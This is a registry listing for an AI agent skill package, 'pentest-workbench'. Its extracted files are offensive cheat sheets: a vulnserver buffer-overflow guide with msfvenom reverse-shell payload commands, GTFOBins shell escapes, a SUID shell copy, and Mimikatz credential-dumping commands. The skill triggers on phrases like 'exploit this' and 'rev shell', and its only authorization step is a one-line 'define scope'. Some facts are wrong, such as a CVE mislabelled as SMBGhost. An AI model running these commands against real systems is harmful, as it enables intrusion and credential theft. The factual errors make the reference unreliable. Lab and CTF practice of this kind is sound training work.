Pentest Workbench
Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Skill: Pentest Workbench Owner: mamuaminu Summary: Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Tags: latest:1.0.0 Version history: v1.0.0 | 2026-04-22T12:20:29.875Z | user Initial release: buffer overflow, privesc, recon, tools catalog Archive index: Archive v1.0.0: 8 files, 11392 bytes Files: referenc
Rank
62
Safety
84
Downloads
2.0k
Updated
Oct 9, 2026
Version
1.0.0
Source
CLAWHUB
About
What it does, and when to use it.
Capability contract not published. No trust telemetry is available yet. 2K downloads reported by the source. Last updated 10/9/2026.
Avoid when
- Contract metadata is missing or unavailable for deterministic execution.
Risk flags: missing_or_unavailable_contract, trust_data_unavailable, schema_references_missing
Public facts
Every fact links back to the source it came from.
- Vendor
- Clawhubvendor · observed Oct 9, 2026
- Protocol compatibility
- OpenClawcompatibility · observed Oct 9, 2026
- Adoption signal
- 2K downloadsadoption · observed Oct 9, 2026
- Latest release
- 1.0.0release · observed Apr 22, 2026
- Handshake status
- UNKNOWNsecurity
Install and run
Setup complexity: low.
clawhub skill install s17ff7gwc2t3f0facsm56ktnsd85bcmr:pentest-workbench- Setup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.
- Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.
Contract: missing
curl -s "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/snapshot"
Documentation
CLAWHUB
20,137 characters of source documentation, loaded on request.
Extracted files
5 files captured from the source.
SKILL.md
--- name: pentest-workbench description: "Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testing, analyzing vulnerable targets, conducting privilege escalation, building exploits, or running reconnaissance. Covers: TCP buffer overflows (vulnserver), web application testing (VulnerableWordpress/WPScan), honeypot analysis (Cowrie), GTFOBins/LOLBAS privesc, pwn.college fundamentals, and offensive toolchain automation. Triggers on: run a pentest, exploit this, buffer overflow, privesc, OSCP, CTF, bug bounty, vulnerability assessment, rev shell, test this target." --- # Pentest Workbench ## Quick Start 1. **Define scope** — target, rules of engagement, goals 2. **Recon** — passive OSINT, network enumeration 3. **Identify** — find vulnerabilities, misconfigs, weak points 4. **Exploit** — leverage findings with appropriate technique 5. **Document** — record steps, evidence, impact, remediation ## Core Workflow ### Phase 1: Recon & Enumeration - **Network OSINT**: Use `nmap`, `masscan`, `rustscan` for port discovery - **Passive OSINT**: Subdomain enum, WHOIS, Shodan, Censys, Google dorking - **Web recon**: Dirbuster, ffuf, Burp Suite crawler - **For vulnerable targets**: Netcat manual command probing first **Tools from linked repos:** - `netstalking-osint` — automated OSINT recon workflows - `Pentest-Tools` (40+ categories) — scanner/framework discovery, network_enum ### Phase 2: Vulnerability Analysis - **Web**: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass - **Network**: nmap NSE scripts, Metasploit, searchsploit - **Binary**: IDA/Ghidra for RE, checksec for mitigations - **Config reviews**: weak permissions, default creds, exposed secrets ### Phase 3: Exploitation **Buffer Overflow (vulnserver pattern):** 1. Send oversized input to identify crash point 2. Control EIP with offset measurement 3. Find stable jump (JMP ESP / call esp) 4. Generate shellcode (msfvenom / custom) 5. Execute with proper alignment **Web:** - SQLi → sqlmap or manual union/boolean - XSS → Beef/XSS Hunter - RCE → reverse shell via pentest-tools **Privesc (GTFOBins):** ``` # Check sudo/suid binaries sudo -l find / -perm -4000 2>/dev/null # Shell escape from restricted editor :!/bin/bash ``` **AD Attacks (Pentest-Tools):** - Kerberoasting, AS-REP roasting, SMB relay - BloodHound/Sharphound enum → Golden/DFSRM ### Phase 4: Post-Exploitation - Cowrie honeypot: analyze attacker sessions for TTPs - Privilege escalation: kernel exploits, sudo abuse, service misconfigs - Persistence: scheduled tasks, services, SSH keys - Lateral movement: PsExec, WMI, SMB, Pass-the-Hash ### Phase 5: Documentation - Steps reproducible by another tester - Evidence: screenshots, packet captures, log output - Impact: CVSS score, business risk - Remediation: specific, actionable fixes ## Key References - **Binary exploitation**: See `references/buffer-overflow.md` (vulnser
_meta.json
{
"ownerId": "kn76xphpfv9rd6m5y7nbv9fttx85a4m6",
"slug": "pentest-workbench",
"version": "1.0.0",
"publishedAt": 1776860429875
}references/buffer-overflow.md
# Buffer Overflow Exploitation Guide (vulnserver)
## Overview
vulnserver is a Windows TCP server (port 9999) with 14 intentionally vulnerable commands. Each uses `strcpy` into undersized buffers — classic stack overflow training ground.
## Vulnerable Functions
### In vulnserver.c
| Function | Buffer | Command(s) | Offset to EIP |
|----------|--------|------------|---------------|
| Function1 | 140 chars | GTER | ~144 |
| Function2 | 60 chars | KSTET | ~64 |
| Function3 | 2000 chars | TRUN, GMON, LTER | ~2003 |
| Function4 | 1000 chars | HTER (hex-encoded) | ~1004 |
### In essfunc.dll
| Function | Buffer Size | Notes |
|----------|-------------|-------|
| EssentialFunc10 | 140 | strcpy |
| EssentialFunc11 | 60 | strcpy |
| EssentialFunc12 | 2000 | strcpy + printf status |
| EssentialFunc13 | 2000 | strcpy |
| EssentialFunc14 | 1000 | strcpy |
## Exploitation Phases
### 1. Fuzzing / Crash Identification
Use a fuzzer or manual send to find the crash point:
```
python -c "print('TRUN ' + 'A'*3000)" | nc target 9999
```
Watch for Access Violation (SEH overwrite or EIP control).
### 2. Offset Calculation
Generate a unique pattern (msf-pattern_create or mona.py):
```
!mona pattern_create 3000
```
Send pattern, crash, then:
```
!mona pattern_offset EIP_value
```
### 3. Control EIP
Confirm EIP points to `41414141` (AAAA):
```
buffer = "A"*N + "B"*4 + "C"*remaining
```
Where N = offset, B's overwrite EIP.
### 4. Find Jump Point
Locate a `JMP ESP` or `CALL ESP` in memory without ASLR:
```
!mona jmp -r esp
```
Or use `msf-nasm_shell` to find opcode `FFE4` (JMP ESP).
### 5. Generate Shellcode
Bad chars depend on the command. Common problematic chars: `\x00\x0a\x0d\x25\x26\x3b`
Generate with msfvenom:
```
msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
```
### 6. Handle Mitigations
**DEP (Data Execution Prevention):**
- Use `msfvenom -p windows/meterpreter/reverse_tcp` with `EXITFUNC=thread`
- Or use ROP chain to mark stack as executable (mona rop)
**ASLR:**
- Find modules without ASLR (DLLs, exe)
- Use `!mona opt` to find non-ASLR sections
**SafeSEH:**
- Use non-SEH protected modules
### 7. Egghunter (Small Buffer)
When buffer is too small for full shellcode:
```
egghunter = "\x66\x8b\x42\x3b\x80\x74\x0e\xff\xe2\xeb\xf9" + shellcode
# tag: w00t
```
### Command-Specific Notes
**TRUN**: Input after `TRUN ` — stops at first `.` in data
```
TRUN . + payload
```
**GMON**: Input after `GMON ` — crashes at `strlen > 3950`
```
GMON / + payload (needs / somewhere)
```
**HTER**: Hex-encoded input. Each 2 bytes of ASCII hex → 1 byte.
```
HTER 41424344... (maps to ABCD)
```
**LTER**: Transforms bytes > 0x7f by subtracting 0x7f. Crashes on `.` delimiter.
```
LTER + payload + .
```
## Mona.py Cheatsheet
```
!mona pattern_create <length>
!mona pattern_offset <value>
!mona findmsp
!mona jmp -r esp
!mona rop -m <module.dll>
!mona emulate
!mona config -set WorkingFolder C:\mona
```
## Checklist Bereferences/privesc.md
# Privilege Escalation Reference
## GTFOBins — Unix Binary Abuse
GTFOBins: https://gtfobins.github.io/
### Common GTFOBins Techniques
**vim/vi** — Escape restricted shell:
```
:!/bin/bash
:shell
```
**awk** — Spawn shell:
```
awk 'BEGIN {system("/bin/sh")}'
```
**find** — Exec from file:
```
find . -exec /bin/sh \; -quit
```
**python/perl/ruby/node** — Shell:
```
python -c 'import os; os.system("/bin/sh")'
perl -e 'exec "/bin/sh"'
ruby -e 'exec "/bin/sh"'
node -e 'require("child_process").exec("/bin/sh")'
```
**less/more** — Via paging:
```
less /etc/passwd
!/bin/sh
```
**tar** — Via archive:
```
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```
**cp** — Overwrite sensitive files:
```
cp /bin/sh /tmp/sh && chmod +s /tmp/sh
```
**perl** — SUID parent:
```
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```
## Sudo Abuse Checklist
```bash
sudo -l
# Check for NOPASSWD entries
```
**Known exploitable patterns:**
```
(user) NOPASSWD: /usr/bin/find
(user) NOPASSWD: /usr/bin/vim
(user) NOPASSWD: /usr/bin/less
(user) NOPASSWD: /usr/bin/awk
(user) NOPASSWD: /usr/bin/python
(user) NOPASSWD: /bin/zip /bin/tar /bin/cp
```
## SUID Binary Escalation
Find SUID binaries:
```bash
find / -perm -4000 -type f 2>/dev/null
```
**GTFOBins search**: Filter by Function=Privilege escalation, Context=SUID
**Dangerous patterns:**
- `nmap` (interactive mode → shell)
- `vim` (can read/write any file)
- `less`/`more` (escape to shell)
- `awk` (system exec)
- `python`/`perl`/`ruby` (OS-level access)
## Linux Kernel Exploits
Check kernel version:
```bash
uname -a
cat /etc/issue
```
Known exploits (verify before running):
- `CVE-2022-0847` (DirtyPipe) — Linux 5.8+
- `CVE-2021-4034` (PwnKit) — polkit < 0.120
- `CVE-2019-13272` (PTRACE_TRACEME) — <= 5.1.17
- `CVE-2017-16995` (eBPF) — <= 4.14
- `dirtycow` (CVE-2016-5195) — older kernels
Always verify exploit works in non-production test first.
## Windows Privilege Escalation
### Kernel Exploits
- `MS16-032` — Secondary Logon
- `CVE-2021-34527` (PrintNightmare) — RCE + privesc
- `CVE-2022-26919` (SMBGhost) — for older unpatched systems
### Windows Binary Misconfigs
- `icacls` — Check for weak permissions on system files
- `sc` — Modify service binary path to hijack
- `wmic` — Process creation for lateral
### Always-Useful Windows Enums
```
whoami /all
net user admin
net localgroup administrators
wmic product get name,version
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
```
### LOLBAS (Windows Binaries)
https://lolbas-project.github.io/
Similar concept to GTFOBins but for Windows:
- `certutil.exe` — Download, decode
- `mshta.exe` — Execute HTA/VBS
- `regsvr32.exe` — COM scriptlet execution
- `wmic.exe` — Process execution
- `bitsadmin.exe` — File transfer
## Credential Access
**Mimikatz** (Windows):
```
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
kerberos::list
```
**LaZagne** (Windows + Linux):
```
python laZagne.py all
references/tools-inventory.md
# Tools Inventory All tools catalogued from linked repositories. Organized by category. ## Reconnaissance & OSINT | Tool | Source | Purpose | |------|---------|---------| | `nmap` | Default | Port scanning, service enum, NSE scripts | | `masscan` | Default | Fast TCP port scanner | | `rustscan` | Default | Modern port scanner (golang) | | `Shodan` | Web | Internet-facing device search | | `Censys` | Web | Certificate/OSINT search | | `theHarvester` | Pentest-Tools | Email/subdomain OSINT | | `Amass` | Pentest-Tools | Subdomain enumeration | | `ffuf` | Default | Web directory fuzzing | | `dirb` | Default | Web directory brute force | | `netstalking-osint` | GitHub | Network OSINT automation | ## Web Application Testing | Tool | Source | Purpose | |------|---------|---------| | `Burp Suite` | Default | Web proxy, repeater, intruder | | `OWASP ZAP` | Default | Automated scanner | | `WPScan` | VulnerableWordpress | WordPress vulnerability scanner | | `sqlmap` | Default | SQL injection automation | | `Beef` | Default | XSS framework | | `XSStrike` | Pentest-Tools | XSS detection | | `Commix` | Pentest-Tools | Command injection testing | ## Binary Exploitation | Tool | Source | Purpose | |------|---------|---------| | `msfvenom` | Metasploit | Shellcode generation | | `msf-pattern_create` | Metasploit | Offset pattern creation | | `mona.py` | Corelan (Immunity) | Exploit dev helper (Win) | | `IDA Free` | Hex Rays | Disassembler | | `Ghidra` | NSA | Reverse engineering | | `pwndbg` | GitHub | GDB plugin for exploit dev | | `pwntools` | GitHub | CTF/exploit framework (Python) | | `vulnserver` | GitHub | BO training target | | `checksec` | GitHub | Binary mitigation checks | ## Buffer Overflow Commands ```bash # Pattern generation msf-pattern_create -l 3000 # Shellcode (Windows) msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f c -b "\x00\x0a\x0d" # Egghunter msfvenom -p windows/egghunter -f raw # ASMX alphanumeric shellcode msfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=443 -f alpha2 ``` ## Active Directory | Tool | Source | Purpose | |------|---------|---------| | `BloodHound` | BloodHound | AD relationship graphing | | `SharpHound` | BloodHound | Windows collector | | `CrackMapExec` | Pentest-Tools | AD enum/attack tool | | `Impacket` | GitHub | Python AD attack toolkit | | `Mimikatz` | GitHub | Windows credential access | | `Rubeus` | GitHub | Kerberos attacks | | `PowerSploit` | GitHub | PowerShell AD attacks | | `Nishang` | GitHub | PowerShell offensive scripts | ## Post-Exploitation | Tool | Source | Purpose | |------|---------|---------| | `PowerSploit` | GitHub | PowerShell privesc/persistence | | `Mimikatz` | GitHub | LSASS, ticket extraction | | `LaZagne` | GitHub | Browser/credential recovery | | `SharpMapExec` | Pentest-Tools | Pass-the-Hash | | `Evil-WinRM` | Pentest-Tools | Remote shell via WinRM | | `PsExec` | Sysinternals | Remote code exec | | `WMIExec` | Impacket | Remote WMI execution | | `Cobalt Strik
AionUi
Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | 🌟 Star if you like it!
activepieces
AI Agents & MCPs & AI Workflow Automation • (~400 MCP servers for AI agents) • AI Automation / AI Agent with MCPs • AI Workflows & AI Agents • MCPs for AI Agents
cherry-studio
AI productivity studio with smart chat, autonomous agents, and 300+ assistants.
CopilotKit
The Frontend for Agents & Generative UI. React + Angular
Machine-readable data
The same record, as JSON, for agents and crawlers.
{
"facts": [
{
"factKey": "vendor",
"category": "vendor",
"label": "Vendor",
"value": "Clawhub",
"href": "https://clawhub.ai/mamuaminu/skills/pentest-workbench",
"sourceUrl": "https://clawhub.ai/mamuaminu/skills/pentest-workbench",
"sourceType": "profile",
"confidence": "medium",
"observedAt": "2026-10-09T21:21:22.514Z",
"isPublic": true
},
{
"factKey": "protocols",
"category": "compatibility",
"label": "Protocol compatibility",
"value": "OpenClaw",
"href": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract",
"sourceUrl": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract",
"sourceType": "contract",
"confidence": "medium",
"observedAt": "2026-10-09T21:21:22.514Z",
"isPublic": true
},
{
"factKey": "traction",
"category": "adoption",
"label": "Adoption signal",
"value": "2K downloads",
"href": "https://clawhub.ai/mamuaminu/pentest-workbench",
"sourceUrl": "https://clawhub.ai/mamuaminu/pentest-workbench",
"sourceType": "profile",
"confidence": "medium",
"observedAt": "2026-10-09T21:21:22.514Z",
"isPublic": true
},
{
"factKey": "latest_release",
"category": "release",
"label": "Latest release",
"value": "1.0.0",
"href": "https://clawhub.ai/mamuaminu/pentest-workbench",
"sourceUrl": "https://clawhub.ai/mamuaminu/pentest-workbench",
"sourceType": "release",
"confidence": "medium",
"observedAt": "2026-04-22T12:20:29.875Z",
"isPublic": true
},
{
"factKey": "handshake_status",
"category": "security",
"label": "Handshake status",
"value": "UNKNOWN",
"href": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust",
"sourceUrl": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust",
"sourceType": "trust",
"confidence": "medium",
"observedAt": null,
"isPublic": true
}
],
"events": [
{
"eventType": "release",
"title": "Release 1.0.0",
"description": "Initial release: buffer overflow, privesc, recon, tools catalog",
"href": "https://clawhub.ai/mamuaminu/pentest-workbench",
"sourceUrl": "https://clawhub.ai/mamuaminu/pentest-workbench",
"sourceType": "release",
"confidence": "medium",
"observedAt": "2026-04-22T12:20:29.875Z",
"isPublic": true
}
]
}Record generated Oct 10, 2026.
